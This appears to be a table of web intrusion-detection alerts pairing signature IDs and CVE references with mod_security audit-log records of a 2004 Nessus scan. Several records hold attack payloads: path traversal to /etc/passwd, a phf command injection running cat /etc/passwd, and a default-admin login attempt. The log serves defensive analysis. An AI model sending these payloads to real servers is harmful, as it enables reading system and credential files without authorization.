1660 | | web-application-activity | WEB-IIS trace.axd access | Request: 217.160.165.173 - - [Fri Mar 12 22:45:17 2004] "GET /trace.axd HTTP/1.1" 200 578 Handler: (null) Error: mod_security: Warning. Pattern match "/trace\.axd" at THE_REQUEST. ---------------------------------------- GET /trace.axd HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "TRACE" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1700 | arachNIDS 412 CVE-1999-0951 | web-application-activity | WEB-CGI imagemap.exe access | Request: 217.160.165.173 - - [Fri Mar 12 22:46:51 2004] "GET /cgi-bin/imagemap.exe HTTP/1.1" 403 304 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/imagemap.exe ---------------------------------------- GET /cgi-bin/imagemap.exe HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1703 | CAN-2001-0212 BID2367 Nessus 10638 | web-application-attack | WEB-CGI auktion.cgi directory traversal attempt | Request: 217.160.165.173 - - [Fri Mar 12 22:41:50 2004] "GET /cgi-bin/auktion.cgi?menue=../../../../../../../../../etc/passwd HTTP/1.1" 403 303 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/auktion.cgi ---------------------------------------- GET /cgi-bin/auktion.cgi?menue=../../../../../../../../../etc/passwd HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1704 | BID2663 CVE-2001-0463 | web-application-attack | WEB-CGI cal_make.pl directory traversal attempt | Request: 217.160.165.173 - - [Fri Mar 12 22:40:22 2004] "GET /cgi-bin/cal_make.pl?p0=../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 578 Handler: cgi-script Error: mod_security: Invalid character detected [0] ---------------------------------------- GET /cgi-bin/cal_make.pl?p0=../../../../../../../../../etc/passwd%00 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Invalid character detected mod_security-action: 200 HTTP/1.1 200 OK Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1709 | | web-application-activity | WEB-CGI ad.cgi access | Request: 218.73.15.215 - - [Wed Mar 10 21:37:04 2004] "GET http://www.afreeb.com/offers/ad.cgi?of=855&af=207902 HTTP/1.0" 302 315 Handler: proxy-server Error: mod_security: Warning. Pattern match "/ad\.cgi" at THE_REQUEST. ---------------------------------------- GET http://www.afreeb.com/offers/ad.cgi?of=855&af=207902 HTTP/1.0 Accept: */* Accept-Language: en Host: www.afreeb.com Pragma: no-cache Referer: http://searchwithbest.com/search.php?PHPSESSID=a0107b976c97977efcaa628d1d163ff2&q=auctions User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0) X-Forwarded-For: 204.149.149.128 mod_security-message: Warning. Pattern match "/ad\.cgi" at THE_REQUEST. HTTP/1.0 302 Found Location: http://offersquest.directtrack.com/ad/335/CD982/lead_info=207902 Content-Type: text/html; charset=iso-8859-1 X-Cache: MISS from www.testproxy.net Connection: close |
1710 | | web-application-activity | WEB-CGI bbs_forum.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:45:07 2004] "GET /cgi-bin/bbs_forum.cgi HTTP/1.1" 404 301 Handler: cgi-script Error: mod_security: Warning. Pattern match "/bbs_forum\.cgi" at THE_REQUEST. ---------------------------------------- GET /cgi-bin/bbs_forum.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/bbs_forum\.cgi" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=94 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1711 | | web-application-activity | WEB-CGI bsguest.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:45:27 2004] "GET /cgi-bin/bsguest.cgi HTTP/1.1" 404 299 Handler: cgi-script Error: mod_security: Warning. Pattern match "/bsguest\.cgi" at THE_REQUEST. ---------------------------------------- GET /cgi-bin/bsguest.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/bsguest\.cgi" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1712 | | web-application-activity | WEB-CGI bslist.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:45:31 2004] "GET /cgi-bin/bslist.cgi HTTP/1.1" 403 302 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/bslist.cgi ---------------------------------------- GET /cgi-bin/bslist.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1713 | | web-application-activity | WEB-CGI cgforum.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:45:34 2004] "GET /cgi-bin/cgforum.cgi HTTP/1.1" 403 303 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/cgforum.cgi ---------------------------------------- GET /cgi-bin/cgforum.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=97 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1715 | | web-application-activity | WEB-CGI register.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:45:41 2004] "GET /cgi-bin/register.cgi HTTP/1.1" 403 304 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/register.cgi ---------------------------------------- GET /cgi-bin/register.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=37 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1716 | CVE-2000-1131 | web-application-activity | WEB-CGI gbook.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:45:38 2004] "GET /cgi-bin/gbook.cgi HTTP/1.1" 403 301 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/gbook.cgi ---------------------------------------- GET /cgi-bin/gbook.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=63 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1717 | | web-application-activity | WEB-CGI simplestguest.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:45:42 2004] "GET /cgi-bin/simplestguest.cgi HTTP/1.1" 403 309 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/simplestguest.cgi ---------------------------------------- GET /cgi-bin/simplestguest.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=25 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1724 | CAN-2002-1526 | web-application-activity | WEB-CGI emumail.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:45:36 2004] "GET /cgi-bin/emumail.cgi HTTP/1.1" 403 303 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/emumail.cgi ---------------------------------------- GET /cgi-bin/emumail.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=79 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1730 | Nessus 10645 CAN-2001-0466 | web-application-attack | WEB-CGI ustorekeeper.pl directory traversal attempt | Request: 217.160.165.173 - - [Fri Mar 12 22:39:10 2004] "GET /cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd HTTP/1.1" 403 307 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/ustorekeeper.pl ---------------------------------------- GET /cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1762 | CVE-1999-0067 arachNIDS 128 BID629 | web-application-attack | WEB-CGI phf arbitrary command execution attempt | Request: 217.160.165.173 - - [Fri Mar 12 22:42:32 2004] "GET /cgi-bin/phf?QALIAS=x%0a/bin/cat%20/etc/passwd HTTP/1.1" 200 578 Handler: cgi-script Error: mod_security: Invalid character detected [10] ---------------------------------------- GET /cgi-bin/phf?QALIAS=x%0a/bin/cat%20/etc/passwd HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Invalid character detected mod_security-action: 200 HTTP/1.1 200 OK Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1767 | CAN-2000-0835 Nessus 10514 | web-application-activity | WEB-MISC search.dll access | Request: 61.237.215.17 - - [Thu Mar 11 06:01:23 2004] "GET http://www.qksrv.net/click-1378908-5319899-828608071012204703?loc=http://search.ebay.com/search/search.dll?query=dreamcast&MfcISAPICommand=GetResult&ht=1&SortProperty=MetaEndSort HTTP/1.0" 302 753 Handler: proxy-server Error: mod_security: Warning. Pattern match "/search\.dll" at THE_REQUEST. ---------------------------------------- GET http://www.qksrv.net/click-1378908-5319899-828608071012204703?loc=http://search.ebay.com/search/search.dll?query=dreamcast&MfcISAPICommand=GetResult&ht=1&SortProperty=MetaEndSort HTTP/1.0 Accept: image/gif, image/jpeg, image/x-xbitmap, application/vnd.ms-excel, */* Accept-Language: en-us Host: www.qksrv.net Pragma: no-cache Referer: http://search.revenuepilot.com/servlet/search?mode=search&id=8601&sid=0&keyword=Dreamcast User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows ME) X-Forwarded-For: 205.94.253.235 mod_security-message: Access denied with code 200. Pattern match "/search" at THE_REQUEST. HTTP/1.0 302 Found P3P: policyref="http://www.qksrv.net/w3c/p3p.xml", CP="ALL BUS LEG DSP COR ADM CUR DEV PSA OUR NAV INT" Cache-control: no-cache Pragma: max-age=0 Location: http://www.commission-junction.com/track/track.dll?AID=5319899&PID=1378908&UID1811=arxjpg5-800295679-1079002883781-20&CBID=t8rs8ycq&SID=828608071012204703&loc=http%3A%2F%2Fsearch.ebay.com%2Fsearch%2Fsearch.dll%3Fquery%3Ddreamcast&MfcISAPICommand=GetResult&ht=1&SortProperty=MetaEndSort Set-Cookie: S=arxjpg5-800295679-1079002883781-20; domain=.qksrv.net; path=/; expires=Tue, 10-Mar-2009 11:01:23 GMT Set-Cookie: QKINFO=ef5d-360uz-tjz0-828608071012204703-120-t8rs8ycq-; domain=.qksrv.net; path=/; expires=Tue, 10-Mar-2009 11:01:23 GMT Set-Cookie: LCLK=cjo!ef5d-t8rs8ycq; domain=.qksrv.net; path=/; expires=Tue, 10-Mar-2009 11:01:23 GMT Content-Type: text/html Content-Length: 753 X-Cache: MISS from www.testproxy.net Connection: close |
1769 | macintouch | web-application-activity | WEB-MISC .DS_Store access | Request: 217.160.165.173 - - [Fri Mar 12 22:38:42 2004] "GET /.DS_Store HTTP/1.1" 403 293 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/.DS_Store ---------------------------------------- GET /.DS_Store HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1770 | securiteam | web-application-activity | WEB-MISC .FBCIndex access | Request: 217.160.165.173 - - [Fri Mar 12 22:42:45 2004] "GET /.FBCIndex HTTP/1.1" 404 289 Handler: (null) Error: mod_security: Warning. Pattern match "/\.FBCIndex" at THE_REQUEST. ---------------------------------------- GET /.FBCIndex HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/\.FBCIndex" at THE_REQUEST. HTTP/1.1 404 Not Found Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1772 | ms00-094 | web-application-activity | WEB-IIS pbserver access | Request: 217.160.165.173 - - [Fri Mar 12 22:46:53 2004] "GET /pbserver/pbserver.dll HTTP/1.1" 403 305 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/pbserver ---------------------------------------- GET /pbserver/pbserver.dll HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1774 | securiteam | web-application-activity | WEB-PHP bb_smilies.php access | Request: 217.160.165.173 - - [Fri Mar 12 22:42:00 2004] "GET //bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK HTTP/1.1" 404 295 Handler: (null) Error: mod_security: Warning. Pattern match "/bb_smilies\.php" at THE_REQUEST. ---------------------------------------- GET //bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/bb_smilies\.php" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1787 | BID4889 BID4887 BID4886 BID4885 | web-application-activity | WEB-CGI csPassword.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:45:34 2004] "GET /cgi-bin/csPassword.cgi HTTP/1.1" 403 306 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/csPassword.cgi ---------------------------------------- GET /cgi-bin/csPassword.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=93 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1824 | BID4983 Nessus 11027 | web-application-activity | WEB-CGI alienform.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:41:51 2004] "GET /alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd HTTP/1.1" 403 297 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/alienform.cgi ---------------------------------------- GET /alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1825 | BID4983 Nessus 11027 | web-application-activity | WEB-CGI AlienForm af.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:41:52 2004] "GET /cgi-bin/af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd HTTP/1.1" 403 298 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/af.cgi ---------------------------------------- GET /cgi-bin/af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1826 | Nessus 11037 | web-application-activity | WEB-MISC WEB-INF access | Request: 217.160.165.173 - - [Fri Mar 12 22:30:21 2004] "GET /./WEB-INF/ HTTP/1.1" 404 288 Handler: (null) Error: mod_security: Warning. Pattern match "/WEB-INF" at THE_REQUEST. ---------------------------------------- GET /./WEB-INF/ HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/WEB-INF" at THE_REQUEST. HTTP/1.1 404 Not Found Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1827 | BID5193 Nessus 11041 | web-application-attack | WEB-MISC Tomcat servlet mapping cross site scripting attempt | Request: 217.160.165.173 - - [Fri Mar 12 22:37:18 2004] "GET /servlet/org.apache.catalina.servlets.DefaultServlet/index.html HTTP/1.1" 403 346 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/servlet ---------------------------------------- GET /servlet/org.apache.catalina.servlets.DefaultServlet/index.html HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=99 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1829 | BID4575 Nessus 11046 | web-application-activity | WEB-MISC Tomcat TroubleShooter servlet access | Request: 217.160.165.173 - - [Fri Mar 12 22:38:23 2004] "GET /examples/servlet/TroubleShooter HTTP/1.1" 404 311 Handler: (null) Error: mod_security: Warning. Pattern match "/examples/servlet/TroubleShooter" at THE_REQUEST. ---------------------------------------- GET /examples/servlet/TroubleShooter HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/examples/servlet/TroubleShooter" at THE_REQUEST. HTTP/1.1 404 Not Found Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1830 | BID4575 Nessus 11046 | web-application-activity | WEB-MISC Tomcat SnoopServlet servlet access | Request: 217.160.165.173 - - [Fri Mar 12 22:39:32 2004] "GET /examples/servlet/SnoopServlet HTTP/1.1" 404 309 Handler: (null) Error: mod_security: Warning. Pattern match "/examples/servlet/SnoopServlet" at THE_REQUEST. ---------------------------------------- GET /examples/servlet/SnoopServlet HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/examples/servlet/SnoopServlet" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=98 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1847 | CAN-1999-0643 Nessus 10816 | web-application-activity | WEB-MISC webalizer access | Request: 217.160.165.173 - - [Fri Mar 12 22:30:34 2004] "GET /webalizer/ HTTP/1.1" 404 290 Handler: (null) Error: mod_security: Warning. Pattern match "/webalizer/" at THE_REQUEST. ---------------------------------------- GET /webalizer/ HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/webalizer/" at THE_REQUEST. HTTP/1.1 404 Not Found Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1848 | Nessus 10298 CAN-1999-0610 | web-application-activity | WEB-MISC webcart-lite access | Request: 217.160.165.173 - - [Fri Mar 12 22:37:46 2004] "GET /webcart-lite/config/clients.txt HTTP/1.1" 403 315 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/webcart-lite ---------------------------------------- GET /webcart-lite/config/clients.txt HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=97 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1851 | CAN-2000-0642 Nessus 10470 | web-application-activity | WEB-MISC active.log access | Request: 217.160.165.173 - - [Fri Mar 12 22:42:37 2004] "GET /active.log HTTP/1.1" 404 290 Handler: (null) Error: mod_security: Warning. Pattern match "/active\.log" at THE_REQUEST. ---------------------------------------- GET /active.log HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/active\.log" at THE_REQUEST. HTTP/1.1 404 Not Found Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1852 | Nessus 10302 | web-application-activity | WEB-MISC robots.txt access | Request: 217.160.165.173 - - [Fri Mar 12 22:30:21 2004] "GET /robots.txt HTTP/1.1" 404 290 Handler: (null) Error: mod_security: Warning. Pattern match "/robots\.txt" at THE_REQUEST. ---------------------------------------- GET /robots.txt HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/robots\.txt" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1857 | Nessus 10302 | web-application-activity | WEB-MISC robot.txt access | Request: 217.160.165.173 - - [Fri Mar 12 22:44:23 2004] "GET /robot.txt HTTP/1.1" 404 289 Handler: (null) Error: mod_security: Warning. Pattern match "/robot\.txt" at THE_REQUEST. ---------------------------------------- GET /robot.txt HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/robot\.txt" at THE_REQUEST. HTTP/1.1 404 Not Found Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1859 | Nessus 10995 | default-login-attempt | WEB-MISC Sun JavaServer default password login attempt | Request: 217.160.165.173 - - [Fri Mar 12 22:32:09 2004] "GET /servlet/admin?category=server&method=listAll&Authorization=Digest+username%3D%22admin%22%2C+response%3D%22ae9f86d6beaa3f9ecb9a5b7e072a4138%22%2C+nonce%3D%222b089ba7985a883ab2eddcd3539a6c94%22%2C+realm%3D%22adminRealm%22%2C+uri%3D%22%2Fservlet%2Fadmin%22&service= HTTP/1.0" 200 566 Handler: (null) Error: mod_security: pausing [/servlet/admin] for 50000 ms ---------------------------------------- GET /servlet/admin?category=server&method=listAll&Authorization=Digest+username%3D%22admin%22%2C+response%3D%22ae9f86d6beaa3f9ecb9a5b7e072a4138%22%2C+nonce%3D%222b089ba7985a883ab2eddcd3539a6c94%22%2C+realm%3D%22adminRealm%22%2C+uri%3D%22%2Fservlet%2Fadmin%22&service= HTTP/1.0 mod_security-message: Access denied with code 200. Pattern match "ae9f86d6beaa3f9ecb9a5b7e072a4138" at THE_REQUEST. mod_security-action: 200 HTTP/1.0 200 OK Connection: close Content-Type: text/html; charset=iso-8859-1 |
